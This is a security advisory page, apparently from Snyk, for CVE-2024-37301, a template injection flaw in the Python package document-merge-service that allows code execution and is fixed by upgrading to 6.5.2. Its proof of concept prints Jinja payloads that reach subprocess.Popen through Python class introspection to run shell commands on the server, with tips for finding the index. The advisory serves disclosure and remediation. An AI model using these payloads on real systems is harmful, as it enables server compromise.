Improper Neutralization of Special Elements Used in a Template Engine Affecting document-merge-service package, versions [,6.5.2)
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-DOCUMENTMERGESERVICE-7247198
- published 12 Jun 2024
- disclosed 11 Jun 2024
- credit c0rydoras
Introduced: 11 Jun 2024
CVE-2024-37301 Open this link in a new tabHow to fix?
Upgrade document-merge-service to version 6.5.2 or higher.
Overview
document-merge-service is a Merge Document Template Service
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements Used in a Template Engine in the server's context, where it is executed as the user with the UID 901. An attacker can execute arbitrary code on the server by injecting malicious templates.
PoC
Add the following to a document, upload and render it:
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %}
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.class.mro[1].subclasses()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a:
{{ PLACEHOLDER.class.mro[1].subclasses()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.